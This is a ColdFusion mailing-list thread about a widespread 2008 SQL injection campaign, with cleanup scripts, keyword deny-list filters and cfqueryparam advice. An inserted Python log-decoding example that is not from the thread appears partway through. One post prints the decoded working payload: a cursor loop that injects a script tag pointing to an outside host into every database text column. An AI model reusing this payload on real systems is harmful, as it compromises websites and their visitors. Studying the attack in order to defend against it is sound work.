CLOSE Table_Cursor
DEALLOCATE Table_Cursor
-------------------------------------------------------
1) Replace the value of @script (the select at the top) with the value of
the string that's been inserted into your DB
2) Run the script AS IS - you should see a list of "update" statements that
look like this:
update [**tablename] set [**columnName] = Replace([**ColumnName],'<script src="*scriptsrc"></script><!---','')
Where **tablename and **columname represent actual tables/columns from your
DB.
You can then run the updates individually to strip out the malicious code...
I also converted the update to a select to compare the values and see what
the result would be on update.
3) If you are brave you can comment out the "EXEC(@sql)" line and rerun the
script. Doing so will hit every table and every char column with these
updates so be sure you know what you are doing.
-Mark
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309371
----- Excess quoted text cut - see Original Post for more -----
That's fine, until the attack pattern contains something else, like Unicode
sequences. Figuring out what patterns to deny is a losing battle. It's much
more efficient to simply allow only acceptable actions, which is what
CFQUERYPARAM does.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309370
>>For what it's worth, the specific URL that was injected in the sample I
saw
(http://1.verynx.cn/w.js) doesn't seem to work anymore. The
server name
doesn't resolve.
===============
Yeah, that sucks, I was going to dissect it.
It is broken now, but this morning I was able to see the code.
Apparently all it was doing was to document.write some code containing
an iFrame with an address to another Chinese site:
http://ll80.com/.
I've opened the site, but it is all Chinese for me ;-)
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309368
>>If several people on this list are seeing this attack, it must be pretty
widespread.
Until now, I just check for strings "http" or "user" in url.id
containing something else than an integer value.
I now just added "DECLARE" in the validation.
All my templates expecting id=<some numeric>
start with this code (included):
<CFIF val(id) EQ 0 AND (id CONTAINS "http" OR id CONTAINS "user" OR id CONTAINS "DECLARE")>
    ... save IP of this guy in the banned addresses table...
</CFIF>
This is even more efficient than CFQUERYPARAM, because this way I'm sure
the guy will not have another chance.
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309369
For what it's worth, the specific URL that was injected in the sample I
saw
(http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name
doesn't resolve.
===============
Yeah, that sucks, I was going to dissect it. It appears that DNS is
resolving it to 127.0.0.1. I didn't know you could do that. verynx.cn
resolves to 121.12.169.186, but it returns a 404 when I submit a GET for
w.js.
Hmm, some off-shore joint. "Asia Pacific Network Information Centre"
owns the IP the domain resolves to. Shows up as possibly being in
Beijing, China.
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309367
----- Excess quoted text cut - see Original Post for more -----
For what it's worth, the specific URL that was injected in the sample I saw
(http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name
doesn't resolve.
Second, if you can restore a previous copy of the database, that might be
easier.
Also, I'd recommend that you identify the problem scripts that contain the
vulnerability before you restore the database. Otherwise, you might have to
repeat the process.
Finally, you might consider implementing filtering at the web server to
block long (and presumably problematic) URLs before they're even sent to CF.
If you're using IIS, you can do that with the latest version of URLScan. If
you're using Apache, I think mod_security will let you do this.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309366
The hacker's hope is that you will be outputting one of those varchar
fields into a webpage without escaping HTML characters. The extra text
being inserted into the database fields will include a malicious
JavaScript file from another server into the webpage. I haven't looked
at the JS to see what it does, but it probably tries to load some Trojan
via an ActiveX applet or something.
To clean your database, I would recommend reverse-engineering the attack
to loop over your database columns and remove the text they placed in
there. In the meantime, shut your site down so you don't infect your
customers.
~Brad
We had the same hack on our site, did you guys figure out exactly what
happened or how and where the SQL was run? Or what the hacker's purpose
was?
Author: Wayne Janeck
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309365
We had the same hack on our site, did you guys figure out exactly what happened
or how and where the SQL was run? Or what the hacker's purpose was?
Author: james carberry
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309364
Just put the following line at the TOP of your application.cfm to inoculate your
CF webs against this attack:
<cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC(">
    <cfabort>
</cfif>
peace, j
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309362
> Even easier than monkeying with every single one of your
----- Excess quoted text cut - see Original Post for more -----
That would stop this specific problem, but would be easily circumvented by
using one of the other mechanisms for executing strings on SQL Server.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309363
Band-Aids and duct tape...
Filtering for known attacks: moderately useful as a stop gap if you are
in the middle of an attack.
Holistic approach to seal the original vulnerability against ALL current
and future attacks (cfqueryparam): highly desirable.
~Brad
Even easier than monkeying with every single one of your cfqueries....
just add the following line to the TOP of all your application.cfm files:
<cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC(">
    <cfabort>
</cfif>
This will immediately shut down execution of any CFM that this piece of
trash tries to invoke to execute this particular type of SQL for.
peace, j
Author: Kris Jones
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309361
It'll show in your logs of course. We also have error reports that
dump the error info and certain collections and mail it to the dev
team.
-KJ
----- Excess quoted text cut - see Original Post for more -----
Author: james carberry
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309360
Even easier than monkeying with every single one of your cfqueries.... just add
the following line to the TOP of all your application.cfm files:
<cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC(">
    <cfabort>
</cfif>
This will immediately shut down execution of any CFM that this piece of trash
tries to invoke to execute this particular type of SQL for.
peace, j
----- Excess quoted text cut - see Original Post for more -----
Author: james carberry
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309359
----- Excess quoted text cut - see Original Post for more -----
>CHAR(4000));EXEC(@S);
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309358
Sweet nectar... I'm trying this out and blogging it tonight. If it's
pretty easy to run I think we should promote an international check your
freakin' cfqueries day! Who wants to buy the party hats and streamers?
~Brad
I was just looking into that myself.
http://qpscanner.riaforge.org/
Author: Che Vilnonis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309357
+1
Good idea!
Good on ya, mate. If there were an award for using cfqueryparam I would
give it to you.
Since this seems to be such a hot topic right now, has anyone heard of a
CFML code scanner to check for vulnerable cfqueries kind of like the var
scoper does?
Maybe we should write one to promote security in the CF community.
~Brad
We're getting hit hard today with this. They're failing, because we use
cfqueryparam and cfprocparam. But it is quite annoying.
-KJ
Author: Joshua Cyr
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309356
I was just looking into that myself.
http://qpscanner.riaforge.org/
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309355
Good on ya, mate. If there were an award for using cfqueryparam I would
give it to you.
Since this seems to be such a hot topic right now, has anyone heard of a
CFML code scanner to check for vulnerable cfqueries kind of like the var
scoper does?
Maybe we should write one to promote security in the CF community.
~Brad
We're getting hit hard today with this. They're failing, because we
use cfqueryparam and cfprocparam. But it is quite annoying.
-KJ
Author: Gerald Guido
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309353
>>We're getting hit hard today with this.
>>/rss.cfm?
Is it just rss.cfm? I haven't looked at our logs yet. Where did you see
this? The server log files?
~~G~~
> We're getting hit hard today with this. They're failing, because we
> use cfqueryparam and cfprocparam. But it is quite annoying.
>
> -KJ
Author: Kris Jones
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309351
We're getting hit hard today with this. They're failing, because we
use cfqueryparam and cfprocparam. But it is quite annoying.
-KJ
Author: Josh Nathanson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309349
I am seeing these too on our site, in errors generated by bad data going
into a cfqueryparam.
If several people on this list are seeing this attack, it must be pretty
widespread.
-- Josh
----- Excess quoted text cut - see Original Post for more -----
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309348
Mutha!!!
Our company JUST had this happen. We're working through it right now.
Thanks for the confirmation guys. Appreciated.
Works great for me. You have to remove the extra line breaks though.
Here is what it does:
Did you read the blog I posted? It explains it all.
Tried printing the code in SQL Analyzer and got nothing. Can anyone
translate it to text? Not sure what I am missing.
/rss.cfm?';DECLARE @S CHAR(4000);SET
>>Why bother looking around the internet? Use your SQL server to decode
it!
Huh... Learn sumptin new every day. That is why I keep coming back here.
;)
Thanx Brad.
~G~
Author: Gerald Guido
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309346
>>Drop database foo
>> Crap, I just let another one slip. Brace yourself for another wave of
attacks... :)
Let's not forget what a mess Little Bobby Tables made.
http://xkcd.com/327/
--
"If everything seems under control, you're not going fast enough"
-- Mario Andretti
Author: Che Vilnonis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309343
Yep, read the post. Must have been the line breaks that messed things up.
Works great for me. You have to remove the extra line breaks though.
Here is what it does:
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309340
I appreciate your concern, but I'm pretty certain the bad people out
there wanting to use this already know how to do it if they haven't
already.
One doesn't have to be too creative to come up with unique ways of
screwing with databases.
Drop database foo
Crap, I just let another one slip. Brace yourself for another wave of
attacks... :)
~Brad
Good point. My bad...
Can we please stop distributing this script ;)
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309338
Works great for me. You have to remove the extra line breaks though.
Here is what it does:
DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
    select a.name, b.name
    from sysobjects a, syscolumns b
    where a.id=b.id and a.xtype='u'
      and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
    exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://1.verynx.cn/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://1.verynx.cn/w.js"></script><!--''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
Did you read the blog I posted? It explains it all.
Tried printing the code in SQL Analyzer and got nothing. Can anyone
translate it to text? Not sure what I am missing.
/rss.cfm?';DECLARE @S CHAR(4000);SET
>>Why bother looking around the internet? Use your SQL server to decode
it!
Huh... Learn sumptin new every day. That is why I keep coming back here.
;)
Thanx Brad.
~G~
Author: Che Vilnonis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309337
Good point. My bad...
Can we please stop distributing this script ;)
Tried printing the code in SQL Analyzer and got nothing. Can anyone
translate it to text? Not sure what I am missing.
/rss.cfm?';DECLARE @S CHAR(4000);SET
Author: Dave Francis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309336
Can we please stop distributing this script ;)
Tried printing the code in SQL Analyzer and got nothing. Can anyone
translate it to text? Not sure what I am missing.
/rss.cfm?';DECLARE @S CHAR(4000);SET
Author: Che Vilnonis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309335
Tried printing the code in SQL Analyzer and got nothing. Can anyone
translate it to text? Not sure what I am missing.
/rss.cfm?';DECLARE @S CHAR(4000);SET
>>Why bother looking around the internet? Use your SQL server to decode
it!
Huh... Learn sumptin new every day. That is why I keep coming back here. ;)
Thanx Brad.
~G~
Author: Gerald Guido
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309333
>>Why bother looking around the internet? Use your SQL server to decode
it!
Huh... Learn sumptin new every day. That is why I keep coming back here. ;)
Thanx Brad.
~G~
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309332
Why bother looking around the internet? Use your SQL server to decode
it!
Simply change the exec to a print statement. Very important! :)
~Brad
This is some sort of encoding... Like BinHex, spammers use it to obscure
urls and such. Computers read it just fine. If you look around on the
internets you can find a decoder to render it to human readable form. You
just need to figure out what sort of encoding they are using.
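An added example, not code from the thread: Brad's trick of swapping EXEC for PRINT decodes the blob on a SQL Server, and the Python below does the same decoding offline from a logged request (as Kris notes, the attempts show up in the web server logs), so the payload never runs anywhere. The log lines and hex payload are constructed, and the NCHAR/NVARCHAR (UTF-16LE) branch is an assumption beyond the CHAR(4000) wrapper shown on the page.

```python
"""Offline triage of the CAST(0x...)/EXEC(@S) injection requests from this thread.

Added example, not code from the thread. Brad decodes the blob by running it on
SQL Server with EXEC changed to PRINT; this does the same decoding in Python
from a web-server log line, so the payload never touches a database.
The log lines and the hex payload below are constructed, not captured traffic.
"""
import re
from urllib.parse import unquote

# Wrapper shape seen on the page: CAST(0x<hex> AS CHAR(4000)).
# NCHAR/NVARCHAR targets are an assumption beyond the page: SQL Server reads
# the bytes as UTF-16LE for those, so they are decoded differently below.
CAST_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)(?:VAR)?CHAR\s*\(\s*\d+\s*\)\s*\)",
    re.IGNORECASE,
)
# Apache/IIS-style request field: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')
# Keywords of the wrapper itself; compared with spaces and '+' stripped and
# case folded, so the way the log happens to encode spaces does not hide them.
SUSPECT_TOKENS = ("DECLARE@", "CAST(0X", "EXEC(", "SP_EXECUTESQL")


def decode_cast_hex(hex_blob: str, unicode_target: bool) -> str:
    """Return the T-SQL text that CAST(0x<hex> AS ...) would hand to EXEC."""
    if len(hex_blob) % 2:
        hex_blob = "0" + hex_blob  # SQL Server left-pads odd-length binary literals
    raw = bytes.fromhex(hex_blob)
    if unicode_target:
        return raw.decode("utf-16-le", errors="replace")
    # CHAR/VARCHAR targets are single-byte; latin-1 maps every byte 1:1.
    return raw.decode("latin-1")


def is_suspicious(query_string: str) -> bool:
    """Cheap pre-filter on a decoded query string for the wrapper's keywords."""
    flat = re.sub(r"[\s+]", "", unquote(query_string)).upper()
    return any(tok in flat for tok in SUSPECT_TOKENS)


def extract_payloads(query_string: str) -> list:
    """Decode every CAST(0x...) literal in a query string to readable T-SQL."""
    text = unquote(query_string)
    return [decode_cast_hex(h, n.upper() == "N") for h, n in CAST_RE.findall(text)]


def triage_log(lines) -> list:
    """Return (path, [decoded SQL, ...]) for each log line that carries the wrapper."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path, _, query = match.group(1).partition("?")
        if is_suspicious(query):
            hits.append((path, extract_payloads(query)))
    return hits


# Constructed sample: a harmless statement hex-encoded the way the attack
# encoded its cursor loop, wrapped in the same DECLARE/SET/EXEC shell.
SAMPLE_SQL = "PRINT 'constructed sample, not the real payload'"
SAMPLE_HEX = SAMPLE_SQL.encode("latin-1").hex().upper()
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Jul/2008:10:15:02 -0500] "GET /rss.cfm?id=42 HTTP/1.1" 200 512',
    '10.0.0.9 - - [24/Jul/2008:10:15:07 -0500] "GET /rss.cfm?id=1%27;DECLARE%20@S%20'
    'CHAR(4000);SET%20@S=CAST(0x' + SAMPLE_HEX + '%20AS%20CHAR(4000));EXEC(@S);--'
    ' HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for path, payloads in triage_log(SAMPLE_LOG):
        print(f"{path}: {len(payloads)} CAST literal(s)")
        for sql in payloads:
            print("   decoded:", sql)
```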
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309331
Read this:
http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-ASCII
~Brad
Just was looking at a 'user monitor' page on one of my sites and I saw
the
url string below being called. I've seen several sql injection urls
before,
but what the heck are they trying to accomplish here? Everything is
cfqueryparam'ed. Thanks,
Che
Author: Gerald Guido
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309330
This is some sort of encoding... Like BinHex, spammers use it to obscure
urls and such. Computers read it just fine. If you look around on the
internets you can find a decoder to render it to human readable form. You
just need to figure out what sort of encoding they are using
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309329
This is a popular and very malicious SQL injection attack that is making the
rounds:
http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-ASCII
-Mark
Just was looking at a 'user monitor' page on one of my sites and I saw the
url string below being called. I've seen several sql injection urls before,
but what the heck are they trying to accomplish here? Everything is
cfqueryparam'ed. Thanks, Che
/rss.cfm?';DECLARE @S CHAR(4000);SET
Author: Che Vilnonis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309328
Just was looking at a 'user monitor' page on one of my sites and I saw the
url string below being called. I've seen several sql injection urls before,
but what the heck are they trying to accomplish here? Everything is
cfqueryparam'ed. Thanks, Che
/rss.cfm?';DECLARE @S CHAR(4000);SET
May 24, 2012